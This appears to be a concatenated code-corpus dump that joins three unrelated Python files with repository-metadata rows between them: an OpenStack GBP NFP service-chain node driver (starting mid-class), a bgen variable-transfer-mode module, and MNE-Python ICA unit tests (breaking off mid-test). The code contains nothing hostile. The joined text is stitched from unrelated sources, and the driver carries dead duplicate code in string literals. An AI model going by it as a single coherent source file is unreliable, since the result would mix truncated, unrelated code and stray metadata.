def policy_target_added_notification(self, context, network_function_id,
policy_target):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'policy_target_added_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
return cctxt.call(
context,
'policy_target_added_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
def policy_target_removed_notification(self, context, network_function_id,
policy_target):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'policy_target_removed_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
return cctxt.call(
context,
'policy_target_removed_notification',
network_function_id=network_function_id,
policy_target=policy_target)
'''
class NFPNodeDriver(driver_base.NodeDriverBase):
SUPPORTED_SERVICE_TYPES = [
pconst.LOADBALANCER, pconst.FIREWALL, pconst.VPN,
pconst.LOADBALANCERV2]
SUPPORTED_SERVICE_VENDOR_MAPPING = {
pconst.LOADBALANCERV2: ["haproxy_lbaasv2"],
pconst.LOADBALANCER: ["haproxy"],
pconst.FIREWALL: ["vyos", "nfp"],
pconst.VPN: ["vyos"],
}
vendor_name = 'NFP'
required_heat_resources = {
pconst.LOADBALANCERV2: ['OS::Neutron::LBaaS::LoadBalancer',
'OS::Neutron::LBaaS::Listener',
'OS::Neutron::LBaaS::Pool'],
pconst.LOADBALANCER: ['OS::Neutron::LoadBalancer',
'OS::Neutron::Pool'],
pconst.FIREWALL: ['OS::Neutron::Firewall',
'OS::Neutron::FirewallPolicy'],
pconst.VPN: ['OS::Neutron::VPNService'],
}
initialized = False
def __init__(self):
super(NFPNodeDriver, self).__init__()
self._lbaas_plugin = None
@property
def name(self):
return self._name
def initialize(self, name):
self.initialized = True
self._name = name
if cfg.CONF.nfp_node_driver.is_service_admin_owned:
self.resource_owner_tenant_id = self._resource_owner_tenant_id()
else:
self.resource_owner_tenant_id = None
self._setup_rpc_listeners()
self._setup_rpc()
def _setup_rpc_listeners(self):
self.endpoints = [NFPCallbackApi(self)]
self.topic = nfp_rpc_topics.NFP_NODE_DRIVER_CALLBACK_TOPIC
self.conn = n_rpc.create_connection(new=True)
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
return self.conn.consume_in_threads()
def _setup_rpc(self):
self.nfp_notifier = NFPClientApi(nfp_rpc_topics.NFP_NSO_TOPIC)
def _parse_service_flavor_string(self, service_flavor_str):
service_details = {}
if ',' not in service_flavor_str:
service_details['device_type'] = 'nova'
service_details['service_vendor'] = service_flavor_str
else:
service_flavor_dict = dict(item.split('=') for item
in service_flavor_str.split(','))
service_details = {key.strip(): value.strip() for key, value
in service_flavor_dict.iteritems()}
return service_details
def get_plumbing_info(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
service_type = context.current_profile['service_type']
service_flavor_str = context.current_profile['service_flavor']
service_details = self._parse_service_flavor_string(service_flavor_str)
if service_details['device_type'] == 'None':
return {}
# Management PTs are managed by NFP since it supports hosting multiple
# logical services in a single device
plumbing_request = {'management': [], 'provider': [{}],
'consumer': [{}]}
if service_type in [pconst.FIREWALL, pconst.VPN]:
plumbing_request['plumbing_type'] = 'gateway'
else: # Loadbalancer which is one arm
plumbing_request['consumer'] = []
plumbing_request['plumbing_type'] = 'endpoint'
LOG.info(_LI("Requesting plumber for %(plumbing_request)s PTs for "
"service type %(service_type)s"),
{'plumbing_request': plumbing_request,
'service_type': service_type})
return plumbing_request
def validate_create(self, context):
if not context.current_profile:
raise ServiceProfileRequired()
if (not context.current_profile['vendor'] or not
context.current_profile['insertion_mode'] or not
context.current_profile['service_type'] or not
context.current_profile['service_flavor']):
raise RequiredProfileAttributesNotSet()
if context.current_profile['vendor'] != self.vendor_name:
raise NodeVendorMismatch(vendor=self.vendor_name)
if context.current_profile['insertion_mode'].lower() != "l3":
raise UnSupportedInsertionMode()
if context.current_profile['service_type'] not in (
self.SUPPORTED_SERVICE_TYPES):
raise InvalidServiceType()
service_vendor = self._parse_service_flavor_string(
context.current_profile['service_flavor'])['service_vendor']
if (service_vendor.lower() not in
self.SUPPORTED_SERVICE_VENDOR_MAPPING[
context.current_profile['service_type']]):
raise UnSupportedServiceProfile(
service_type=context.current_profile['service_type'],
vendor=context.current_profile['vendor'])
self._is_node_order_in_spec_supported(context)
def validate_update(self, context):
if not context.original_node: # PT create/delete notifications
return
if context.current_node and not context.current_profile:
raise ServiceProfileRequired()
if context.current_profile['vendor'] != self.vendor_name:
raise NodeVendorMismatch(vendor=self.vendor_name)
if context.current_profile['insertion_mode'].lower() != "l3":
raise UnSupportedInsertionMode()
if context.current_profile['service_type'] not in (
self.SUPPORTED_SERVICE_TYPES):
raise InvalidServiceType()
service_vendor = self._parse_service_flavor_string(
context.current_profile['service_flavor'])['service_vendor']
if (service_vendor.lower() not in
self.SUPPORTED_SERVICE_VENDOR_MAPPING[
context.current_profile['service_type']]):
raise UnSupportedServiceProfile(
service_type=context.current_profile['service_type'],
vendor=context.current_profile['vendor'])
def create(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_id = self._create_network_function(context)
self._set_node_instance_network_function_map(
context.plugin_session, context.current_node['id'],
context.instance['id'], network_function_id)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='create')
def update(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if not all([network_function_map, context.original_node.get('config'),
context.current_node.get('config')]):
return
network_function_id = network_function_map.network_function_id
self._update(context, network_function_id)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def delete(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if not network_function_map:
return
network_function_id = network_function_map.network_function_id
try:
self.nfp_notifier.delete_network_function(
context=context.plugin_context,
network_function_id=network_function_id)
except Exception:
LOG.exception(_LE("Delete Network service Failed"))
self._wait_for_network_function_delete_completion(
context, network_function_id)
self._delete_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
def update_policy_target_added(self, context, policy_target):
# TODO: (jiahao) need to review
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
if self._is_service_target(policy_target):
return
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map =\
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.policy_target_added_notification(
context.plugin_context, network_function_id, policy_target)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def update_policy_target_removed(self, context, policy_target):
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
if self._is_service_target(policy_target):
return
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.policy_target_removed_notification(
context.plugin_context, network_function_id, policy_target)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def notify_chain_parameters_updated(self, context):
pass # We are not using the classifier specified in redirect Rule
def update_node_consumer_ptg_added(self, context, policy_target_group):
if context.current_profile['service_type'] == pconst.FIREWALL:
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.consumer_ptg_added_notification(
context.plugin_context,
network_function_id,
policy_target_group)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def update_node_consumer_ptg_removed(self, context, policy_target_group):
if context.current_profile['service_type'] == pconst.FIREWALL:
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.consumer_ptg_removed_notification(
context.plugin_context,
network_function_id,
policy_target_group)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def _wait_for_network_function_delete_completion(self, context,
network_function_id):
time_waited = 0
network_function = None
while time_waited < cfg.CONF.nfp_node_driver.service_delete_timeout:
network_function = self.nfp_notifier.get_network_function(
context.plugin_context, network_function_id)
if not network_function:
break
eventlet.sleep(5)
time_waited = time_waited + 5
if network_function:
LOG.error(_LE("Delete network function %(network_function)s "
"failed"),
{'network_function': network_function_id})
raise NodeInstanceDeleteFailed()
def _wait_for_network_function_operation_completion(self, context,
network_function_id,
operation):
time_waited = 0
network_function = None
# timeout = getattr(cfg.CONF.nfp_node_driver, 'service_' +
# operation.lower() + '_timeout')
timeout = cfg.CONF.nfp_node_driver.service_create_timeout
while time_waited < timeout:
network_function = self.nfp_notifier.get_network_function(
context.plugin_context, network_function_id)
if not network_function:
LOG.error(_LE("Failed to retrieve network function"))
eventlet.sleep(5)
time_waited = time_waited + 5
continue
else:
LOG.info(_LI(operation + " network function result: "
"%(network_function)s"),
{'network_function': network_function})
if (network_function['status'] == 'ACTIVE' or
network_function['status'] == 'ERROR'):
break
eventlet.sleep(5)
time_waited = time_waited + 5
if network_function['status'] != 'ACTIVE':
LOG.error(_LE(operation + "network function %(network_function)s "
"failed. Status: %(status)s"),
{'network_function': network_function_id,
'status': network_function['status']})
if operation.lower() == 'create':
raise NodeInstanceCreateFailed()
elif operation.lower() == 'update':
raise NodeInstanceUpdateFailed()
def _is_service_target(self, policy_target):
if policy_target['name'] and (policy_target['name'].startswith(
plumber_base.SERVICE_TARGET_NAME_PREFIX) or
policy_target['name'].startswith('tscp_endpoint_service') or
policy_target['name'].startswith('vip_pt')):
return True
else:
return False
def _resource_owner_tenant_id(self):
user, pwd, tenant, auth_url = utils.get_keystone_creds()
keystoneclient = keyclient.Client(username=user, password=pwd,
auth_url=auth_url)
try:
tenant = keystoneclient.tenants.find(name=tenant)
return tenant.id
except k_exceptions.NotFound:
with excutils.save_and_reraise_exception(reraise=True):
LOG.error(_LE('No tenant with name %s exists.'), tenant)
except k_exceptions.NoUniqueMatch:
with excutils.save_and_reraise_exception(reraise=True):
LOG.error(_LE('Multiple tenants matches found for %s'), tenant)
def _get_resource_owner_context(self, plugin_context):
if cfg.CONF.nfp_node_driver.is_service_admin_owned:
resource_owner_context = plugin_context.elevated()
resource_owner_context.tenant_id = self.resource_owner_tenant_id
user, pwd, ignore_tenant, auth_url = utils.get_keystone_creds()
keystoneclient = keyclient.Client(username=user, password=pwd,
auth_url=auth_url)
resource_owner_context.auth_token = keystoneclient.get_token(
self.resource_owner_tenant_id)
return resource_owner_context
else:
return plugin_context
def _update(self, context, network_function_id):
if (context.original_node['config'] != context.current_node['config']):
try:
self.nfp_notifier.update_network_function(
context=context.plugin_context,
network_function_id=network_function_id,
config=context.current_node['config'])
except Exception:
LOG.exception(_LE("Update Network service Failed for "
"network function: %(nf_id)s"),
{'nf_id': network_function_id})
else:
LOG.info(_LI("No action to take on update"))
def _get_service_targets(self, context):
service_type = context.current_profile['service_type']
provider_service_targets = []
consumer_service_targets = []
service_flavor_str = context.current_profile['service_flavor']
service_details = self._parse_service_flavor_string(service_flavor_str)
service_targets = context.get_service_targets()
# Bug with NCP. For create, its not setting service targets in context
if not service_targets:
service_targets = context.get_service_targets(update=True)
for service_target in service_targets:
if service_target.relationship == 'consumer':
consumer_service_targets.append(service_target)
elif service_target.relationship == 'provider':
provider_service_targets.append(service_target)
LOG.debug("provider targets: %s consumer targets %s" % (
provider_service_targets, consumer_service_targets))
if (service_details['device_type'] != 'None' and (
not provider_service_targets or (service_type in
[pconst.FIREWALL, pconst.VPN] and not consumer_service_targets))):
LOG.error(_LE("Service Targets are not created for the Node "
"of service_type %(service_type)s"),
{'service_type': service_type})
raise Exception("Service Targets are not created for the Node")
service_target_info = {'provider_ports': [], 'provider_pts': [],
'consumer_ports': [], 'consumer_pts': []}
for service_target in provider_service_targets:
policy_target = context.gbp_plugin.get_policy_target(
context.plugin_context, service_target.policy_target_id)
port = context.core_plugin.get_port(
context.plugin_context, policy_target['port_id'])
service_target_info['provider_ports'].append(port)
service_target_info['provider_pts'].append(policy_target['id'])
for service_target in consumer_service_targets:
policy_target = context.gbp_plugin.get_policy_target(
context.plugin_context, service_target.policy_target_id)
port = context.core_plugin.get_port(
context.plugin_context, policy_target['port_id'])
service_target_info['consumer_ports'].append(port)
service_target_info['consumer_pts'].append(policy_target['id'])
return service_target_info
# Needs a better algorithm
def _is_node_order_in_spec_supported(self, context):
current_specs = context.relevant_specs
service_type_list_in_chain = []
node_list = []
for spec in current_specs:
node_list.extend(spec['nodes'])
for node_id in node_list:
node_info = context.sc_plugin.get_servicechain_node(
context.plugin_context, node_id)
profile = context.sc_plugin.get_service_profile(
context.plugin_context, node_info['service_profile_id'])
service_type_list_in_chain.append(profile['service_type'])
if len(service_type_list_in_chain) != len(
set(service_type_list_in_chain)):
raise DuplicateServiceTypeInChain()
allowed_chain_combinations = [
[pconst.VPN],
[pconst.VPN, pconst.FIREWALL],
[pconst.VPN, pconst.FIREWALL, pconst.LOADBALANCER],
[pconst.VPN, pconst.FIREWALL, pconst.LOADBALANCERV2],
[pconst.FIREWALL],
[pconst.FIREWALL, pconst.LOADBALANCER],
[pconst.FIREWALL, pconst.LOADBALANCERV2],
[pconst.LOADBALANCER],
[pconst.LOADBALANCERV2]]
if service_type_list_in_chain not in allowed_chain_combinations:
raise InvalidNodeOrderInChain()
def _create_network_function(self, context):
sc_instance = context.instance
service_targets = self._get_service_targets(context)
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
config_param_values = sc_instance.get('config_param_values', {})
if config_param_values:
config_param_values = jsonutils.loads(config_param_values)
vip_ip = config_param_values.get('vip_ip')
if not vip_ip:
raise VipNspNotSetonProvider()
for provider_port in service_targets['provider_ports']:
provider_port['allowed_address_pairs'] = [
{'ip_address': vip_ip}]
port = {
'port': provider_port
}
context.core_plugin.update_port(
context.plugin_context, provider_port['id'], port)
port_info = []
if service_targets.get('provider_pts'):
# Device case, for Base mode ports won't be available.
port_info = [
{
'id': service_targets['provider_pts'][0],
'port_model': nfp_constants.GBP_PORT,
'port_classification': nfp_constants.PROVIDER,
}
]
if service_targets.get('consumer_ports'):
port_info.append({
'id': service_targets['consumer_pts'][0],
'port_model': nfp_constants.GBP_PORT,
'port_classification': nfp_constants.CONSUMER,
})
network_function = {
'tenant_id': context.provider['tenant_id'],
'service_chain_id': sc_instance['id'],
'service_id': context.current_node['id'],
'service_profile_id': context.current_profile['id'],
'management_ptg_id': sc_instance['management_ptg_id'],
'service_config': context.current_node.get('config'),
'port_info': port_info,
'network_function_mode': nfp_constants.GBP_MODE,
}
return self.nfp_notifier.create_network_function(
context.plugin_context, network_function=network_function)['id']
def _set_node_instance_network_function_map(
self, session, sc_node_id, sc_instance_id, network_function_id):
with session.begin(subtransactions=True):
sc_node_instance_ns_map = (
ServiceNodeInstanceNetworkFunctionMapping(
sc_node_id=sc_node_id,
sc_instance_id=sc_instance_id,
network_function_id=network_function_id))
session.add(sc_node_instance_ns_map)
def _get_node_instance_network_function_map(self, session, sc_node_id=None,
sc_instance_id=None):
try:
with session.begin(subtransactions=True):
query = session.query(
ServiceNodeInstanceNetworkFunctionMapping)
if sc_node_id:
query = query.filter_by(sc_node_id=sc_node_id)
if sc_instance_id:
query = query.filter_by(sc_instance_id=sc_instance_id)
return query.first()
except NoResultFound:
return None
def _delete_node_instance_network_function_map(self, session, sc_node_id,
sc_instance_id):
with session.begin(subtransactions=True):
sc_node_instance_ns_maps = (
session.query(ServiceNodeInstanceNetworkFunctionMapping).
filter_by(sc_node_id=sc_node_id).
filter_by(sc_instance_id=sc_instance_id).
all())
for sc_node_instance_ns_map in sc_node_instance_ns_maps:
session.delete(sc_node_instance_ns_map)
| apache-2.0 |
newerthcom/savagerebirth | libs/python-2.72/Tools/bgen/bgen/bgenVariable.py | 42 | 3541 | """Variables, arguments and argument transfer modes etc."""
# Values to represent argument transfer modes
InMode = 1 # input-only argument
OutMode = 2 # output-only argument
InOutMode = 3 # input-output argument
ModeMask = 3 # bits to keep for mode
# Special cases for mode/flags argument
# XXX This is still a mess!
SelfMode = 4+InMode # this is 'self' -- don't declare it
ReturnMode = 8+OutMode # this is the function return value
ErrorMode = 16+OutMode # this is an error status -- turn it into an exception
RefMode = 32
ConstMode = 64
class Variable:
"""A Variable holds a type, a name, a transfer mode and flags.
Most of its methods call the correponding type method with the
variable name.
"""
def __init__(self, type, name = None, flags = InMode):
"""Call with a type, a name and flags.
If name is None, it muse be set later.
flags defaults to InMode.
"""
self.type = type
self.name = name
self.flags = flags
self.mode = flags & ModeMask
def declare(self):
"""Declare the variable if necessary.
If it is "self", it is not declared.
"""
if self.flags == ReturnMode+RefMode:
self.type.declare(self.name, reference=True)
elif self.flags != SelfMode:
self.type.declare(self.name)
def getArgDeclarations(self, fullmodes=False):
refmode = (self.flags & RefMode)
constmode = False
outmode = False
if fullmodes:
constmode = (self.flags & ConstMode)
outmode = (self.flags & OutMode)
return self.type.getArgDeclarations(self.name,
reference=refmode, constmode=constmode, outmode=outmode)
def getAuxDeclarations(self):
return self.type.getAuxDeclarations(self.name)
def getargsFormat(self):
"""Call the type's getargsFormatmethod."""
return self.type.getargsFormat()
def getargsArgs(self):
"""Call the type's getargsArgsmethod."""
return self.type.getargsArgs(self.name)
def getargsCheck(self):
return self.type.getargsCheck(self.name)
def getargsPreCheck(self):
return self.type.getargsPreCheck(self.name)
def passArgument(self):
"""Return the string required to pass the variable as argument.
For "in" arguments, return the variable name.
For "out" and "in out" arguments,
return its name prefixed with "&".
"""
if self.mode == InMode:
return self.type.passInput(self.name)
if self.mode & RefMode:
return self.type.passReference(self.name)
if self.mode in (OutMode, InOutMode):
return self.type.passOutput(self.name)
# XXX Shouldn't get here
return "/*mode?*/" + self.type.passInput(self.name)
def errorCheck(self):
"""Check for an error if necessary.
This only generates code if the variable's mode is ErrorMode.
"""
if self.flags == ErrorMode:
self.type.errorCheck(self.name)
def mkvalueFormat (self):
"""Call the type's mkvalueFormat method."""
return self.type.mkvalueFormat()
def mkvalueArgs(self):
"""Call the type's mkvalueArgs method."""
return self.type.mkvalueArgs(self.name)
def mkvaluePreCheck(self):
return self.type.mkvaluePreCheck(self.name)
def cleanup(self):
"""Call the type's cleanup method."""
return self.type.cleanup(self.name)
| gpl-2.0 |
jmontoyam/mne-python | mne/preprocessing/tests/test_ica.py | 3 | 27879 | from __future__ import print_function
# Author: Denis Engemann <denis.engemann@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License: BSD (3-clause)
import os
import os.path as op
import warnings
from nose.tools import assert_true, assert_raises, assert_equal, assert_false
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_allclose)
from scipy import stats
from itertools import product
from mne import Epochs, read_events, pick_types, create_info, EpochsArray
from mne.cov import read_cov
from mne.preprocessing import (ICA, ica_find_ecg_events, ica_find_eog_events,
read_ica, run_ica)
from mne.preprocessing.ica import (get_score_funcs, corrmap, _get_ica_map,
_ica_explained_variance, _sort_components)
from mne.io import read_raw_fif, Info, RawArray
from mne.io.meas_info import _kind_dict
from mne.io.pick import _DATA_CH_TYPES_SPLIT
from mne.tests.common import assert_naming
from mne.utils import (catch_logging, _TempDir, requires_sklearn, slow_test,
run_tests_if_main)
# Set our plotters to test mode
import matplotlib
matplotlib.use('Agg') # for testing don't use X server
import matplotlib.pyplot as plt # noqa
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(data_dir, 'test_raw.fif')
event_name = op.join(data_dir, 'test-eve.fif')
test_cov_name = op.join(data_dir, 'test-cov.fif')
event_id, tmin, tmax = 1, -0.2, 0.2
# if stop is too small pca may fail in some cases, but we're okay on this file
start, stop = 0, 6
score_funcs_unsuited = ['pointbiserialr', 'ansari']
try:
from sklearn.utils.validation import NonBLASDotWarning
warnings.simplefilter('error', NonBLASDotWarning)
except:
pass
@requires_sklearn
def test_ica_full_data_recovery():
"""Test recovery of full data when no source is rejected."""
# Most basic recovery
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
with warnings.catch_warnings(record=True): # bad proj
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
evoked = epochs.average()
n_channels = 5
data = raw._data[:n_channels].copy()
data_epochs = epochs.get_data()
data_evoked = evoked.data
for method in ['fastica']:
stuff = [(2, n_channels, True), (2, n_channels // 2, False)]
for n_components, n_pca_components, ok in stuff:
ica = ICA(n_components=n_components,
max_pca_components=n_pca_components,
n_pca_components=n_pca_components,
method=method, max_iter=1)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=list(range(n_channels)))
raw2 = ica.apply(raw.copy(), exclude=[])
if ok:
assert_allclose(data[:n_channels], raw2._data[:n_channels],
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(data[:n_channels] - raw2._data[:n_channels])
assert_true(np.max(diff) > 1e-14)
ica = ICA(n_components=n_components,
max_pca_components=n_pca_components,
n_pca_components=n_pca_components)
with warnings.catch_warnings(record=True):
ica.fit(epochs, picks=list(range(n_channels)))
epochs2 = ica.apply(epochs.copy(), exclude=[])
data2 = epochs2.get_data()[:, :n_channels]
if ok:
assert_allclose(data_epochs[:, :n_channels], data2,
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(data_epochs[:, :n_channels] - data2)
assert_true(np.max(diff) > 1e-14)
evoked2 = ica.apply(evoked.copy(), exclude=[])
data2 = evoked2.data[:n_channels]
if ok:
assert_allclose(data_evoked[:n_channels], data2,
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(evoked.data[:n_channels] - data2)
assert_true(np.max(diff) > 1e-14)
assert_raises(ValueError, ICA, method='pizza-decomposision')
@requires_sklearn
def test_ica_rank_reduction():
"""Test recovery ICA rank reduction."""
# Most basic recovery
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
n_components = 5
max_pca_components = len(picks)
for n_pca_components in [6, 10]:
with warnings.catch_warnings(record=True): # non-convergence
warnings.simplefilter('always')
ica = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=n_pca_components,
method='fastica', max_iter=1).fit(raw, picks=picks)
rank_before = raw.estimate_rank(picks=picks)
assert_equal(rank_before, len(picks))
raw_clean = ica.apply(raw.copy())
rank_after = raw_clean.estimate_rank(picks=picks)
# interaction between ICA rejection and PCA components difficult
# to preduct. Rank_after often seems to be 1 higher then
# n_pca_components
assert_true(n_components < n_pca_components <= rank_after <=
rank_before)
@requires_sklearn
def test_ica_reset():
"""Test ICA resetting."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
run_time_attrs = (
'_pre_whitener',
'unmixing_matrix_',
'mixing_matrix_',
'n_components_',
'n_samples_',
'pca_components_',
'pca_explained_variance_',
'pca_mean_'
)
with warnings.catch_warnings(record=True):
ica = ICA(
n_components=3, max_pca_components=3, n_pca_components=3,
method='fastica', max_iter=1).fit(raw, picks=picks)
assert_true(all(hasattr(ica, attr) for attr in run_time_attrs))
ica._reset()
assert_true(not any(hasattr(ica, attr) for attr in run_time_attrs))
@requires_sklearn
def test_ica_core():
"""Test ICA on raw and epochs."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
# XXX. The None cases helped revealing bugs but are time consuming.
test_cov = read_cov(test_cov_name)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
noise_cov = [None, test_cov]
# removed None cases to speed up...
n_components = [2, 1.0] # for future dbg add cases
max_pca_components = [3]
picks_ = [picks]
methods = ['fastica']
iter_ica_params = product(noise_cov, n_components, max_pca_components,
picks_, methods)
# # test init catchers
assert_raises(ValueError, ICA, n_components=3, max_pca_components=2)
assert_raises(ValueError, ICA, n_components=2.3, max_pca_components=2)
# test essential core functionality
for n_cov, n_comp, max_n, pcks, method in iter_ica_params:
# Test ICA raw
ica = ICA(noise_cov=n_cov, n_components=n_comp,
max_pca_components=max_n, n_pca_components=max_n,
random_state=0, method=method, max_iter=1)
assert_raises(ValueError, ica.__contains__, 'mag')
print(ica) # to test repr
# test fit checker
assert_raises(RuntimeError, ica.get_sources, raw)
assert_raises(RuntimeError, ica.get_sources, epochs)
# test decomposition
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=pcks, start=start, stop=stop)
repr(ica) # to test repr
assert_true('mag' in ica) # should now work without error
# test re-fit
unmixing1 = ica.unmixing_matrix_
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=pcks, start=start, stop=stop)
assert_array_almost_equal(unmixing1, ica.unmixing_matrix_)
sources = ica.get_sources(raw)[:, :][0]
assert_true(sources.shape[0] == ica.n_components_)
# test preload filter
raw3 = raw.copy()
raw3.preload = False
assert_raises(ValueError, ica.apply, raw3,
include=[1, 2])
#######################################################################
# test epochs decomposition
ica = ICA(noise_cov=n_cov, n_components=n_comp,
max_pca_components=max_n, n_pca_components=max_n,
random_state=0)
with warnings.catch_warnings(record=True):
ica.fit(epochs, picks=picks)
data = epochs.get_data()[:, 0, :]
n_samples = np.prod(data.shape)
assert_equal(ica.n_samples_, n_samples)
print(ica) # to test repr
sources = ica.get_sources(epochs).get_data()
assert_true(sources.shape[1] == ica.n_components_)
assert_raises(ValueError, ica.score_sources, epochs,
target=np.arange(1))
# test preload filter
epochs3 = epochs.copy()
epochs3.preload = False
assert_raises(ValueError, ica.apply, epochs3,
include=[1, 2])
# test for bug with whitener updating
_pre_whitener = ica._pre_whitener.copy()
epochs._data[:, 0, 10:15] *= 1e12
ica.apply(epochs.copy())
assert_array_equal(_pre_whitener, ica._pre_whitener)
# test expl. var threshold leading to empty sel
ica.n_components = 0.1
assert_raises(RuntimeError, ica.fit, epochs)
offender = 1, 2, 3,
assert_raises(ValueError, ica.get_sources, offender)
assert_raises(ValueError, ica.fit, offender)
assert_raises(ValueError, ica.apply, offender)
@slow_test
@requires_sklearn
def test_ica_additional():
"""Test additional ICA functionality."""
tempdir = _TempDir()
stop2 = 500
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
# XXX This breaks the tests :(
# raw.info['bads'] = [raw.ch_names[1]]
test_cov = read_cov(test_cov_name)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
# test if n_components=None works
with warnings.catch_warnings(record=True):
ica = ICA(n_components=None,
max_pca_components=None,
n_pca_components=None, random_state=0)
ica.fit(epochs, picks=picks, decim=3)
# for testing eog functionality
picks2 = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=True, exclude='bads')
epochs_eog = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks2,
baseline=(None, 0), preload=True, add_eeg_ref=False)
test_cov2 = test_cov.copy()
ica = ICA(noise_cov=test_cov2, n_components=3, max_pca_components=4,
n_pca_components=4)
assert_true(ica.info is None)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks[:5])
assert_true(isinstance(ica.info, Info))
assert_true(ica.n_components_ < 5)
ica = ICA(n_components=3, max_pca_components=4,
n_pca_components=4)
assert_raises(RuntimeError, ica.save, '')
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=[1, 2, 3, 4, 5], start=start, stop=stop2)
# test corrmap
ica2 = ica.copy()
ica3 = ica.copy()
corrmap([ica, ica2], (0, 0), threshold='auto', label='blinks', plot=True,
ch_type="mag")
corrmap([ica, ica2], (0, 0), threshold=2, plot=False, show=False)
assert_true(ica.labels_["blinks"] == ica2.labels_["blinks"])
assert_true(0 in ica.labels_["blinks"])
template = _get_ica_map(ica)[0]
corrmap([ica, ica3], template, threshold='auto', label='blinks', plot=True,
ch_type="mag")
assert_true(ica2.labels_["blinks"] == ica3.labels_["blinks"])
plt.close('all')
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
ica_badname = op.join(op.dirname(tempdir), 'test-bad-name.fif.gz')
ica.save(ica_badname)
read_ica(ica_badname)
assert_naming(w, 'test_ica.py', 2)
# test decim
ica = ICA(n_components=3, max_pca_components=4,
n_pca_components=4)
raw_ = raw.copy()
for _ in range(3):
raw_.append(raw_)
n_samples = raw_._data.shape[1]
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=None, decim=3)
assert_true(raw_._data.shape[1], n_samples)
# test expl var
ica = ICA(n_components=1.0, max_pca_components=4,
n_pca_components=4)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=None, decim=3)
assert_true(ica.n_components_ == 4)
ica_var = _ica_explained_variance(ica, raw, normalize=True)
assert_true(np.all(ica_var[:-1] >= ica_var[1:]))
# test ica sorting
